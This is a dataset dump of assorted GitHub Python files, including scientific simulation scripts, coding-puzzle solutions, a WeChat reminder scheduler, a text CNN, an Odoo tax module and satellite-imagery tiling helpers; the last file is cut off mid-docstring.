+{"seq_id":"43318610399","text":"from pydna_epbd.monitors.monitor import Monitor\n\n\nclass BubbleMonitor(Monitor):\n \"\"\"The bubble monitor collects DNA bubbles for each bp at different thresholds.\n For a threshold, if a bps distance is more than the threshold, it computes the\n bubble length starting from that bp until the next bps distance is less\n than the threshold. In this implementation, the minimum and maximum bubble length are\n considered in between 3 and 20, inclusive. The number of thresholds are set to 20 by\n default from 0.5 Angstrom to 10.5 Angstrom with step size 0.5 Angstrom.\n \"\"\"\n\n TRESHOLDS = [i / 10 for i in range(5, 105, 5)] # start=.5, end=10.5, step.5\n TRESHOLD_SIZE = len(TRESHOLDS)\n MIN_BUB_ELEM, MAX_BUB_ELEM = 3, 20\n\n def __init__(self, dna) -> None:\n \"\"\"Initialize BubbleMonitor object.\n\n Args:\n dna (DNA): A DNA object.\n \"\"\"\n super(BubbleMonitor, self).__init__(dna)\n self.bubbles = [\n [[0] * self.TRESHOLD_SIZE for _ in range(self.MAX_BUB_ELEM)]\n for _ in range(self.dna.n_nt_bases)\n ] # shape=(n_nt_bases, MAX_BUB_ELEM, TRESHOLD_SIZE)\n\n def collect_at_step(self, step_no):\n \"\"\"Collects bubbles at every post-preheating steps.\n\n Args:\n step_no (int): Step number.\n \"\"\"\n # bubbles are collected at every temperature\n for base_idx in range(self.dna.n_nt_bases): # for each base\n for tr_idx in range(self.TRESHOLD_SIZE): # for each threshold\n R = 0\n p = base_idx\n tr = self.TRESHOLDS[tr_idx]\n while self.dna.coords_dist[p] >= tr and R + 1 < self.dna.n_nt_bases:\n R += 1\n p = base_idx + R\n if p >= self.dna.n_nt_bases:\n p = p - self.dna.n_nt_bases # - 1\n if R >= self.MIN_BUB_ELEM:\n length = min(R, self.MAX_BUB_ELEM - 1)\n self.bubbles[base_idx][length][tr_idx] += 1\n if R == 0:\n break\n","repo_name":"lanl/pyDNA_EPBD","sub_path":"pydna_epbd/monitors/bubble_monitor.py","file_name":"bubble_monitor.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
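The inner while loop of `collect_at_step` above is a run-length count: starting at a base, it walks forward while the strand displacement stays at or above the threshold. A simplified, hypothetical helper (no wrap-around across the sequence end, unlike the real monitor) that isolates that idea:

def bubble_length(coords_dist, start, threshold, max_len=20):
    # length of the run of displacements >= threshold starting at `start`
    length = 0
    for d in coords_dist[start:start + max_len]:
        if d < threshold:
            break
        length += 1
    return length

dists = [0.2, 0.9, 1.1, 1.3, 0.7, 0.1]
assert bubble_length(dists, 1, 0.5) == 4   # run: 0.9, 1.1, 1.3, 0.7
assert bubble_length(dists, 1, 1.0) == 0   # 0.9 is already below the threshold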
+{"seq_id":"42350786125","text":"#!/bin/python3\n\nimport sys\nfrom collections import Counter\n\n# Complete the anagram function below.\ndef anagram(s):\n    n = len(s)\n    if n % 2:\n        return -1\n    half = Counter(s[n // 2:])\n    # count the characters of the first half that exceed their\n    # available count in the second half\n    exchange = 0\n    for ch, cnt in Counter(s[:n // 2]).items():\n        exchange += max(0, cnt - half[ch])\n    return exchange\n\n\nif __name__ == '__main__':\n    q = int(input())\n\n    for q_itr in range(q):\n        s = input()\n\n        result = anagram(s)\n\n        sys.stdout.write(str(result) + '\\n')\n","repo_name":"kopyshev/HackerRankCheckIO","sub_path":"HackerRank/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
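A worked instance of the Counter-difference idea above: split the string into halves and sum, per character, how many occurrences in the first half are not covered by the second half.

from collections import Counter

s = "xaxbbbxx"                       # halves: "xaxb" and "bbxx"
first, second = Counter(s[:4]), Counter(s[4:])
changes = sum(max(0, n - second[ch]) for ch, n in first.items())
assert changes == 1                  # turning one 'a' into a 'b' makes the halves anagrams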
+{"seq_id":"23881515128","text":"\"\"\"\nParameters and run script for Section 4.2.3\n\"\"\"\n\n\nimport numpy as np\nimport porepy as pp\n\nfrom common_models import Poromechanics, solid_values\nfrom grids import horizontal_fracture_3d\nfrom utility_functions import run_simulation_pairs_varying_parameters\n\nif __name__ == \"__main__\":\n    nc = 15\n\n    solid_values.update(\n        {\n            \"permeability\": 1e-5,\n            \"biot_coefficient\": 0.2,\n            \"residual_aperture\": 1e-1,\n        }\n    )\n    solid = pp.SolidConstants(solid_values)\n    fluid = pp.FluidConstants({\"compressibility\": 1e-3})\n    params = {\n        \"use_tpfa\": True,\n        \"time_manager\": pp.TimeManager(\n            schedule=[0, 1e5], dt_init=1e5, constant_dt=True\n        ),\n        \"plotting_file_name\": \"biot_fracture\",\n        \"file_name\": \"biot_fracture\",\n        \"folder_name\": \"biot_fracture\",\n        \"grid_method\": horizontal_fracture_3d,\n        \"mesh_args\": np.array([nc, nc, nc - 1]),\n        \"nl_convergence_tol\": 1e-12,\n        \"material_constants\": {\"solid\": solid, \"fluid\": fluid},\n    }\n    k = 1e1\n    update_params = {\n        \"10\": {\"legend_title\": r\"Source [$m^3/s$]\", \"fluid_source_value\": k},\n        \"20\": {\"fluid_source_value\": 2 * k},\n        \"30\": {\"fluid_source_value\": 3 * k},\n        \"40\": {\"fluid_source_value\": 4 * k},\n    }\n\n    run_simulation_pairs_varying_parameters(params, update_params, Poromechanics)\n","repo_name":"keileg/differentiable_mpfa","sub_path":"run_biot_fracture.py","file_name":"run_biot_fracture.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7410822667","text":"#!/usr/bin/env python\n#\n# double precision dft subroutine\n# xaratustrah\n# 2016\n#\n\n#import cmath\nimport math\nimport numpy as np\n\n\ndef dft(x):\n xre = [s.real for s in x]\n xim = [s.imag for s in x]\n\n n = len(xre)\n y = [complex(0, 0)] * n\n \n for k in range(n): # For each output element\n sumreal = 0.0\n sumimag = 0.0\n for t in range(n): # For each input element\n angle = 2 * math.pi * t * k / n\n sumreal += xre[t] * math.cos(angle) + xim[t] * math.sin(angle)\n sumimag += -xre[t] * math.sin(angle) + xim[t] * math.cos(angle)\n y[k] = complex(sumreal, sumimag)\n return y\n\n\n# ----------------------------\n\ndef main():\n x = [complex(1, 2), complex(2, 3), complex(3, 4), complex(4, 5)]\n y = dft(x)\n print('In:')\n print(x)\n print('Out:')\n print(y)\n print(np.fft.fft(x))\n\nif __name__ == '__main__':\n main()\n","repo_name":"xaratustrah/dft","sub_path":"py_dft.py","file_name":"py_dft.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
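The real/imaginary sums in the DFT record above are the expanded form of y[k] = sum over t of x[t] * exp(-2*pi*i*t*k/n). A compact cmath version (hypothetical helper name) agreeing with the four-point example from that script; the expected values follow from working the factors 1, -i, -1, i by hand:

import cmath

def dft_exp(x):
    n = len(x)
    # forward DFT with the same sign convention as the cos/sin expansion above
    return [sum(x[t] * cmath.exp(-2j * cmath.pi * t * k / n) for t in range(n))
            for k in range(n)]

x = [1 + 2j, 2 + 3j, 3 + 4j, 4 + 5j]
expected = [10 + 14j, -4 + 0j, -2 - 2j, 0 - 4j]
assert all(cmath.isclose(a, b, abs_tol=1e-9) for a, b in zip(dft_exp(x), expected))

Note the nested loops make this O(n^2); numpy's FFT computes the same result in O(n log n).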
+{"seq_id":"19878910733","text":"import os\nimport pandas as pd\nfrom datetime import datetime\nfrom binascii import hexlify as hex2str\nfrom binascii import unhexlify as str2hex\nfrom struct import unpack\n\nread_command = str2hex('107BFD7816')\n\ndef flip(address):\n if type(address) == list:\n result = list()\n \n for addr in address:\n addr = addr[6:8] + addr[4:6] + addr[2:4] + addr[0:2]\n result.append(addr)\n \n return result\n \n else:\n return address[6:8] + address[4:6] + address[2:4] + address[0:2]\n\ndef crc(address):\n return ('%x' %sum(str2hex('73FD52' + address + 'FFFFFFFF')))[-2:]\n\ndef to_select_command(inverted_address):\n if type(inverted_address) == list:\n result = list()\n for address in inverted_address:\n result.append(str2hex('680B0B6873FD52' + address + 'FFFFFFFF' + crc(address) + '16'))\n \n return result\n \n else:\n return str2hex('680B0B6873FD52' + inverted_address + 'FFFFFFFF' + crc(inverted_address) + '16')\n\ndef current_time():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef to_csv(path, file_name, save_data): \n df = pd.DataFrame([save_data], columns=['datetime', 'address', 'flow_rate', 'total_volume'])\n \n if not os.path.exists(path + file_name):\n df.to_csv(path + file_name, index=False, mode='w', encoding='utf-8-sig')\n \n else:\n df.to_csv(path + file_name, index=False, mode='a', encoding='utf-8-sig', header=False)\n\n\ndef read_format(hex_data, from_start, to_end):\n read_data = hex_data[from_start:to_end]\n read_data = hex2str(read_data)\n read_data = str(read_data)[2:-1]\n return read_data\n\ndef get_return_address(str_data):\n return_address = flip(str_data)\n return return_address\n\ndef get_flow_rate(str_data):\n flow_rate = flip(str_data)\n flow_rate = str2hex(flow_rate)\n flow_rate = unpack('!f', flow_rate)[0]\n \n return flow_rate\n\ndef get_total_volume(str_data):\n total_volume = flip(str_data)\n total_volume = int(total_volume, 16) / 1000\n return total_volume","repo_name":"heee3018/WaterCare","sub_path":"WaterCare_t/drivers/lxc_util.py","file_name":"lxc_util.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
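A worked byte-order example for the helpers in the record above: `flip` reverses the four bytes of a hex-encoded little-endian field, after which the reading can be decoded as a big-endian integer (the sample values here are made up):

addr = "12345678"
flipped = addr[6:8] + addr[4:6] + addr[2:4] + addr[0:2]   # what flip() computes
assert flipped == "78563412"

reading = "10270000"                 # little-endian hex for 10000
assert int("00002710", 16) / 1000 == 10.0   # matches get_total_volume's /1000 scaling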
+{"seq_id":"26493069400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File  : Scheduler.py\n# @Author: Administrator\n# @Date  : 2019/12/11\nfrom schedule.MongoDBUtil import MongoDBUtil\nimport logging\nimport time\nimport uuid\nfrom msg_consumer.SentConsumer import sent_queue_msg, build_queue_msg\nfrom schedule.Scheduler import scheduler, TRIGGER_INTERVAL, TRIGGER_DATE, TRIGGER_CRON\nfrom schedule.WorkDay import is_workday, is_holiday\nfrom datetime import datetime, timedelta\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef if_workday(msg):\n    type_ = msg[\"workday\"]\n    workday = is_workday(datetime.today())\n    if type_ == 0:\n        return True\n    else:\n        if workday and type_ == 1:\n            return True\n        if not workday and type_ == 2:\n            return True\n    return False\n\n\ndef remind_text_job(msg):\n    if if_workday(msg):\n        print('do remind_text_job ' + time.asctime() + ',' + str(msg))\n        message = str(msg[\"do_what\"]) + str(msg[\"tail\"])\n        sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\n# Consider pushing these lookups into a queue handled by several consumers,\n# or caching the result and refreshing it every few hours.\ndef remind_weather_job(msg):\n    if if_workday(msg):\n        print('do remind_weather_job ' + time.asctime() + ',' + str(msg))\n        city_message = str(msg[\"v1\"])\n        weather = get_sojson_weather(city_message)\n        if weather:\n            message = weather + str(msg[\"tail\"])\n            sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\ndef news_job(msg):\n    if if_workday(msg):\n        print('do news_job ' + time.asctime() + ',' + str(msg))\n        news_type = msg[\"v1\"]\n        if news_type == NewsChannel['新闻'].value:\n            new_msg = TianSimpleNews().reply_text()\n        else:\n            new_msg = TianNew().reply_text(10, news_type)\n        if new_msg:\n            message = new_msg + str(msg[\"tail\"])\n            sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\nclass RemindScheduler:\n\n    def __init__(self):\n        self.job_id = ''\n        self.job_msg_type = 0\n        self.job_time = ''\n        self.job_repeat = {}\n        self.trigger_repeat = ''\n        self.job_msg = ''\n        self.user_wxid = ''\n        self.user_say = ''\n        self.v1 = ''\n        self.v2 = ''\n        # private\n        self.job_corn = {}\n\n    def add_job(self, job_msg_type, job_time, job_repeat, job_msg, user_wxid, user_say, v1, v2):\n        self.job_msg_type = job_msg_type\n        self.job_time = job_time\n        self.job_repeat = job_repeat\n        self.job_msg = job_msg\n        self.user_wxid = user_wxid\n        self.user_say = user_say\n        self.v1 = v1\n        self.v2 = v2\n        # enforce the per-user limit on stored jobs\n        num = MongoDBUtil().user_all_num(self.user_wxid)\n        if num >= 15:\n            return -2\n\n        # register the job\n        if all([self.job_time, self.job_msg, self.user_wxid]):\n            # generate a job id\n            self.job_id = str(uuid.uuid1()).replace(\"-\", '')\n            try:\n                if self.job_repeat:\n                    # recurring job\n                    self.parse_repeat_time()\n                    scheduler.add_job(self.get_job_function(), self.trigger_repeat, **self.job_corn,\n                                      args=[self.job_msg], id=self.job_id, start_date=self.job_time)\n                else:\n                    # one-off job\n                    scheduler.add_job(self.get_job_function(), TRIGGER_DATE, run_date=self.job_time,\n                                      args=[self.job_msg], id=self.job_id)\n\n                self.add_mongodb(self.job_id)\n                return 0\n            except Exception as e:\n                logging.info(':( add job exception: %s', e)\n                self.add_mongodb(-1)\n                return -1\n\n    def add_mongodb(self, mongo_job_id):\n        # -1 is stored as the job_id when registering the job failed\n        if self.user_wxid:\n            # user_id + job_id + time + remark\n            mongodb_dic = {'user_id': self.user_wxid, 'job_id': mongo_job_id, 'remark': self.user_say}\n            MongoDBUtil().insert(mongodb_dic)\n        return -1\n\n    def get_job_function(self):\n        if self.job_msg_type == 0:\n            return remind_text_job\n        elif self.job_msg_type == 1:\n            return remind_weather_job\n        elif self.job_msg_type == 3:\n            return news_job\n\n    def parse_repeat_time(self):\n        year_s, mon_s, day_s = self.job_time.split(' ')[0].split('-')\n        hour_s, minute_s, second_s = self.job_time.split(' ')[1].split(':')\n        job_corn_dict = {'year': year_s, 'month': mon_s, 'day': day_s, 'hour': hour_s,\n                         'minute': minute_s, 'second': second_s}\n        if self.job_repeat:\n            for key in self.job_repeat:\n                if self.job_repeat[key] != 1:\n                    self.job_corn = self.job_repeat\n                    self.trigger_repeat = TRIGGER_INTERVAL\n                    return\n\n        if REPEAT_KEY_YEAR in self.job_repeat:\n            year_interval = self.job_repeat.get(REPEAT_KEY_YEAR)\n            update_dict = {'year': '*/' + str(year_interval)}\n        elif REPEAT_KEY_MONTH in self.job_repeat:\n            month_interval = self.job_repeat.get(REPEAT_KEY_MONTH)\n            del job_corn_dict['year']\n            update_dict = {'month': '*/' + str(month_interval)}\n        elif REPEAT_KEY_WEEK in self.job_repeat:\n            week_interval = self.job_repeat.get(REPEAT_KEY_WEEK)\n            del job_corn_dict['year']\n            del job_corn_dict['month']\n            update_dict = {'week': '*/' + str(week_interval)}\n        elif REPEAT_KEY_DAY in self.job_repeat:\n            day_interval = self.job_repeat.get(REPEAT_KEY_DAY)\n            del job_corn_dict['year']\n            del job_corn_dict['month']\n            update_dict = {'day': '*/' + str(day_interval)}\n        elif REPEAT_KEY_HOUR in self.job_repeat:\n            hour_interval = self.job_repeat.get(REPEAT_KEY_HOUR)\n            del job_corn_dict['year']\n            del job_corn_dict['month']\n            del job_corn_dict['day']\n            update_dict = {'hour': '*/' + str(hour_interval)}\n        elif REPEAT_KEY_MINUTE in self.job_repeat:\n            min_interval = self.job_repeat.get(REPEAT_KEY_MINUTE)\n            del job_corn_dict['year']\n            del job_corn_dict['month']\n            del job_corn_dict['day']\n            del job_corn_dict['hour']\n            update_dict = {'minute': '*/' + str(min_interval)}\n        job_corn_dict.update(update_dict)\n        self.job_corn = job_corn_dict\n        self.trigger_repeat = TRIGGER_CRON\n\n\nif __name__ == '__main__':\n    scheduler.start()\n    # add_job requires the v1 and v2 fields; pass empty strings when unused\n    RemindScheduler().add_job(0, '2019-12-13 10:59:00', {'seconds': 2}, 'hahaha', 'user_wxid', 'user_say', '', '')\n    while True:\n        time.sleep(1)\n","repo_name":"tangwenfei123/AlarmRobot","sub_path":"schedule/RemindScheduler.py","file_name":"RemindScheduler.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
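A standalone illustration (hypothetical helper, mirroring `parse_repeat_time` for units that exist in the date fields, i.e. year/month/day/hour/minute) of how a start time plus a repeating unit becomes an APScheduler-style cron dict: fields coarser than the unit are dropped, the unit itself becomes a step expression, and finer fields pin the firing time.

def to_cron(job_time, repeat_unit, interval):
    date_part, time_part = job_time.split(" ")
    fields = ["year", "month", "day", "hour", "minute", "second"]
    values = date_part.split("-") + time_part.split(":")
    cron = dict(zip(fields, values))
    # drop every field coarser than the repeating unit, then mark the unit itself
    for field in fields[:fields.index(repeat_unit)]:
        del cron[field]
    cron[repeat_unit] = "*/%d" % interval
    return cron

assert to_cron("2019-12-13 10:59:00", "day", 1) == {
    "day": "*/1", "hour": "10", "minute": "59", "second": "00"
}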
+{"seq_id":"74292119261","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass TextCNN(nn.Module):\n    def __init__(self):\n        super(TextCNN, self).__init__()\n\n        class_num = 8\n        embedding_dim = 100\n        ci = 1\n        kernel_num = 25\n        # kernel_sizes = [3, 4, 5]\n        # self.convs = nn.ModuleList([nn.Conv2d(ci, kernel_num, (k, embedding_dim / 2)) for k in kernel_sizes])\n        # Meaning of nn.Conv2d(ci, kernel_num, (k, embedding_dim)):\n        # ci is the number of input channels and has to match the data;\n        # kernel_num is the number of output channels;\n        # (k, embedding_dim) is the kernel shape, i.e. a 2-D kernel of size k * embedding_dim.\n        # In nn.Conv2d(ci, cj, k) a scalar k means a square kernel of shape k * k.\n\n        self.conv1 = nn.Conv2d(ci, kernel_num, (3, int(embedding_dim)))  # input must be a 4-D tensor [B, C, L, D]\n        self.conv2 = nn.Conv2d(ci, kernel_num, (5, int(embedding_dim)))\n        self.conv3 = nn.Conv2d(ci, kernel_num, (7, int(embedding_dim)))\n        self.conv4 = nn.Conv2d(ci, kernel_num, (9, int(embedding_dim)))\n\n        self.dropout = nn.Dropout(0.5)  # drop 50% of the units\n        self.classificer = nn.Linear(kernel_num * 4, class_num)\n\n    def conv_and_pool(self, x, conv):\n        # (B, Ci, L, D)\n        x = F.relu(conv(x))  # (B, kernel_num, L-3+1, D-D+1)\n        x = x.squeeze(3)  # (B, kernel_num, L-3+1)\n        x = F.max_pool1d(x, x.size(2))  # (B, kernel_num, 1)\n        x = x.squeeze(2)  # (B, kernel_num); squeeze drops the size-1 dimension\n        return x\n\n    def forward(self, x):\n        # size (B, L, D)\n        x = x.unsqueeze(1)  # (B, Ci, L, D); unsqueeze adds the channel dimension\n\n        x1 = self.conv_and_pool(x, self.conv1)  # (B, kernel_num)\n        x2 = self.conv_and_pool(x, self.conv2)  # (B, kernel_num)\n        x3 = self.conv_and_pool(x, self.conv3)  # (B, kernel_num)\n        x4 = self.conv_and_pool(x, self.conv4)  # (B, kernel_num)\n\n        x = torch.cat((x1, x2, x3, x4), 1)  # (B, len(Ks)*kernel_num)\n        x = self.dropout(x)  # (B, len(Ks)*kernel_num)\n        logit = self.classificer(x)  # (B, C)\n        return logit\n","repo_name":"HUSTHY/classificationTask","sub_path":"pytorch/TextCNN/model/TextCNN.py","file_name":"TextCNN.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
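A shape walk-through of one `conv_and_pool` branch from the TextCNN above, with illustrative sizes B=2, L=64, D=100 and the same 25-channel kernel of height 3:

import torch
import torch.nn as nn
import torch.nn.functional as F

conv = nn.Conv2d(1, 25, (3, 100))
x = torch.randn(2, 1, 64, 100)        # (B, Ci, L, D)
x = F.relu(conv(x))                   # (2, 25, 62, 1): the width axis collapses to 1
x = x.squeeze(3)                      # (2, 25, 62)
x = F.max_pool1d(x, x.size(2))        # (2, 25, 1): max over the whole length axis
assert x.squeeze(2).shape == (2, 25)  # concatenating 4 such branches gives (2, 100)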
+{"seq_id":"31732210188","text":"from odoo import api, fields, models, tools\n\n\nclass AccountMove(models.Model):\n    _inherit = \"account.move\"\n\n    sii_dua_invoice = fields.Boolean(\"SII DUA Invoice\", compute=\"_compute_dua_invoice\")\n\n    @api.model\n    @tools.ormcache(\"company\")\n    def _get_dua_fiscal_position_id(self, company):\n        fp = self.env.ref(\n            \"l10n_es_dua.%i_fp_dua\" % company.id, raise_if_not_found=False\n        )\n        return (\n            fp\n            and fp.id\n            or self.env[\"account.fiscal.position\"]\n            .search(\n                [\n                    (\"name\", \"=\", \"Importación con DUA\"),\n                    (\"company_id\", \"=\", company.id),\n                ],\n                limit=1,\n            )\n            .id\n        )\n\n    @api.depends(\"company_id\", \"fiscal_position_id\", \"invoice_line_ids.tax_ids\")\n    def _compute_dua_invoice(self):\n        for invoice in self:\n            taxes = invoice._get_sii_taxes_map(\n                [\"DUA\"], self._get_document_fiscal_date()\n            )\n            invoice.sii_dua_invoice = invoice.invoice_line_ids.filtered(\n                lambda x: any([tax in taxes for tax in x.tax_ids])\n            )\n\n    @api.depends(\"sii_dua_invoice\", \"fiscal_position_id\")\n    def _compute_sii_enabled(self):\n        \"\"\"Don't send secondary DUA invoices to the SII.\"\"\"\n        res = super()._compute_sii_enabled()\n        for invoice in self.filtered(\"sii_enabled\"):\n            dua_fiscal_position_id = self._get_dua_fiscal_position_id(\n                invoice.company_id\n            )\n            if (\n                dua_fiscal_position_id\n                and invoice.fiscal_position_id.id == dua_fiscal_position_id\n                and not invoice.sii_dua_invoice\n            ):\n                invoice.sii_enabled = False\n        return res\n\n    def _get_sii_invoice_dict_in(self, cancel=False):\n        \"\"\"According to the AEAT documentation, an import operation is\n        registered with TipoFactura = F5, without FechaOperacion, and with the\n        company's own NIF in IDEmisorFactura and Contraparte.\n        See section 8.1.2.2, 'Ejemplo mensaje XML de alta de importación', in\n        the web services description document.\n\n        For an invoice (with the LC box checked) that complements a DUA\n        invoice, TipoFactura = LC must be kept. See points 4.24 and 4.25 of\n        this PDF:\n        https://www.agenciatributaria.es/static_files/AEAT/Contenidos_Comunes/La_Agencia_Tributaria/Modelos_y_formularios/Suministro_inmediato_informacion/V_1_1/Faqs_General/FAQs11_11_2020.pdf  # noqa\n        \"\"\"\n        res = super()._get_sii_invoice_dict_in(cancel=cancel)\n        if res.get(\"FacturaRecibida\") and self.sii_dua_invoice:\n            if not self.sii_lc_operation:\n                res[\"FacturaRecibida\"][\"TipoFactura\"] = \"F5\"\n                res[\"FacturaRecibida\"].pop(\"FechaOperacion\", None)\n            nif = self.company_id.partner_id._parse_aeat_vat_info()[2]\n            res[\"FacturaRecibida\"][\"IDEmisorFactura\"] = {\"NIF\": nif}\n            res[\"IDFactura\"][\"IDEmisorFactura\"] = {\"NIF\": nif}\n            res[\"FacturaRecibida\"][\"Contraparte\"][\"NIF\"] = nif\n            res[\"FacturaRecibida\"][\"Contraparte\"][\"NombreRazon\"] = self.company_id.name\n            res[\"FacturaRecibida\"].pop(\"ImporteTotal\", False)\n        return res\n","repo_name":"OCA/l10n-spain","sub_path":"l10n_es_dua_sii/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"es","doc_type":"code","stars":203,"dataset":"github-code","pt":"69"}
+{"seq_id":"15771469033","text":"import cv2 as cv\r\nimport mediapipe as mp\r\n\r\n\r\nclass position():\r\n    def __init__(self):\r\n        self.mpPose = mp.solutions.pose\r\n        self.pose = self.mpPose.Pose()\r\n        self.myDraw = mp.solutions.drawing_utils\r\n\r\n    def findBody(self, frame, draw=True):\r\n        imgRGB = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\r\n        self.results = self.pose.process(imgRGB)\r\n\r\n        if self.results.pose_landmarks and draw:\r\n            self.myDraw.draw_landmarks(frame, self.results.pose_landmarks, self.mpPose.POSE_CONNECTIONS)\r\n        return frame\r\n\r\n    def find_position(self, frame, draw=True):\r\n        lmlist = []\r\n\r\n        if self.results.pose_landmarks:\r\n            for id, ln in enumerate(self.results.pose_landmarks.landmark):\r\n                h, w, c = frame.shape\r\n                cx, cy = int(ln.x * w), int(ln.y * h)\r\n                lmlist.append([id, cx, cy])\r\n                if draw:\r\n                    cv.circle(frame, (cx, cy), 5, (255, 0, 255), cv.FILLED)\r\n        return lmlist\r\n\r\n\r\ndef main():\r\n    cap = cv.VideoCapture(0)\r\n    position_obj = position()\r\n\r\n    while True:\r\n        _, frame = cap.read()\r\n        frame = position_obj.findBody(frame)\r\n        lmlist = position_obj.find_position(frame, draw=False)\r\n        if len(lmlist) != 0:\r\n            print(lmlist[14])  # landmark 14 is the right elbow\r\n            cv.circle(frame, (lmlist[14][1], lmlist[14][2]), 15, (0, 0, 255), cv.FILLED)\r\n        cv.imshow(\"Test\", frame)\r\n        k = cv.waitKey(1)\r\n        if k == ord(\"q\"):\r\n            break\r\n\r\n    cap.release()\r\n    cv.destroyAllWindows()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"Jagathratchakan/Open-Cv","sub_path":"pose_estimation.py","file_name":"pose_estimation.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"36063190888","text":"from time import time\nfrom statistics import mode\n\nstart = time()\n\nwith open(\"day03input.txt\", \"r\") as file_in:\n diag = [x for x in file_in.read().rstrip().split(\"\\n\")]\n\n# print(diag)\n\n\ndef part_one():\n positions = dict()\n for number in diag:\n for pos in range(len(number)):\n if pos in positions.keys():\n positions[pos].append(number[pos])\n else:\n positions[pos] = [number[pos]]\n # print(positions)\n gamma_lst = []\n epsilon_lst = []\n for pos in positions.keys():\n pos_mode = mode(positions[pos])\n gamma_lst.append(pos_mode)\n epsilon_lst.append(str(abs(int(pos_mode)-1)))\n gamma = int(''.join(gamma_lst), 2)\n epsilon = int(''.join(epsilon_lst), 2)\n return gamma * epsilon\n\n\ndef part_two():\n oxygen = diag\n co2 = diag\n for pos in range(len(diag[0])):\n oxy_count = 0\n for number in oxygen:\n oxy_count += int(number[pos])\n co2_count = 0\n for number in co2:\n co2_count += int(number[pos])\n if oxy_count >= len(oxygen)/2:\n oxy_mode = 1\n else:\n oxy_mode = 0\n if co2_count < len(co2)/2:\n co2_antimode = 1\n else:\n co2_antimode = 0\n new_oxygen = list()\n for number in oxygen:\n if len(oxygen) == 1:\n new_oxygen.append(number)\n break\n if int(number[pos]) == oxy_mode:\n new_oxygen.append(number)\n oxygen = new_oxygen\n new_co2 = list()\n for number in co2:\n if len(co2) == 1:\n new_co2.append(number)\n break\n if int(number[pos]) == co2_antimode:\n new_co2.append(number)\n co2 = new_co2\n # print(oxygen, co2)\n return int(''.join(oxygen[0]), 2) * int(''.join(co2[0]), 2)\n\n\nprint(part_one())\n\nprint(part_two())\n\nprint(\"computed in \" + str(time() - start) + \" seconds\")\n","repo_name":"waal42/AdventOfCode","sub_path":"2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
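The bit-criteria in the day03 record above can be sanity-checked against the puzzle's published example (AoC 2021 day 3), where gamma = 22, epsilon = 9 and the power consumption is 198; `>=` implements the same tie-breaking toward 1 that part_two uses for the oxygen rating:

sample = ["00100", "11110", "10110", "10111", "10101", "01111",
          "00111", "11100", "10000", "11001", "00010", "01010"]
gamma_bits = ""
for pos in range(len(sample[0])):
    ones = sum(int(n[pos]) for n in sample)
    gamma_bits += "1" if ones >= len(sample) / 2 else "0"
gamma = int(gamma_bits, 2)
epsilon = gamma ^ (2 ** len(sample[0]) - 1)   # epsilon is gamma with all bits flipped
assert (gamma, epsilon, gamma * epsilon) == (22, 9, 198)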
+{"seq_id":"26016153920","text":"import json\nfrom math import ceil\nimport os\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nfrom shapely.geometry import Polygon\nfrom sentinelhub import (\n    SHConfig,\n    bbox_to_dimensions,\n    CRS,\n    BBox,\n    BBoxSplitter,\n    SentinelHubRequest,\n    DataCollection,\n    MimeType,\n)\n\nfrom config.default import CfgNode\n\n\ndef get_sentinelhub_config(config_file: str) -> SHConfig:\n    \"\"\"Loads sentinel hub config from file and returns it\"\"\"\n    config = SHConfig()\n\n    with open(config_file, \"r\") as f:\n        config_vals = json.load(f)\n\n    config.instance_id = config_vals[\"instance_id\"]\n    config.sh_client_id = config_vals[\"sh_client_id\"]\n    config.sh_client_secret = config_vals[\"sh_client_secret\"]\n\n    return config\n\n\ndef get_total_size(polygon: Polygon, resolution: float) -> Tuple[float]:\n    \"\"\"Returns the total size of the polygon in pixels given resolution\n\n    Args:\n        polygon (Polygon): The polygon to get the size of\n        resolution (float): The resolution of the image (in meters)\n\n    Returns:\n        Tuple[float]: Size of the polygon in pixels\n    \"\"\"\n    splitter = BBoxSplitter(\n        [polygon], CRS.WGS84, split_shape=[1, 1], reduce_bbox_sizes=True\n    )\n    cropped_tile = splitter.get_bbox_list()[0]\n    size = bbox_to_dimensions(cropped_tile, resolution=resolution)\n    return size\n\n\ndef get_tiles_coord(\n    lat: Tuple[float],\n    long: Tuple[float],\n    resolution: float,\n    upper_size_margin: int = 2400,\n) -> List[BBox]:\n    \"\"\"Given latitude, longitude, resolution and an upper size limit,\n    returns a list of bounding boxes into which the polygon should be divided\n\n    Args:\n        lat (Tuple[float]): The latitude of the polygon [south, north]\n        long (Tuple[float]): The longitude of the polygon [west, east]\n        resolution (float): The resolution of the image (in meters)\n        upper_size_margin (int, optional): Upper margin for tile size.\n                                           Defined by API download limitation.\n                                           Defaults to 2400.\n\n    Returns:\n        List[BBox]: List of BBoxes which correspond to tiles to which polygon is divided\n                    Coordinates in BBox are in format 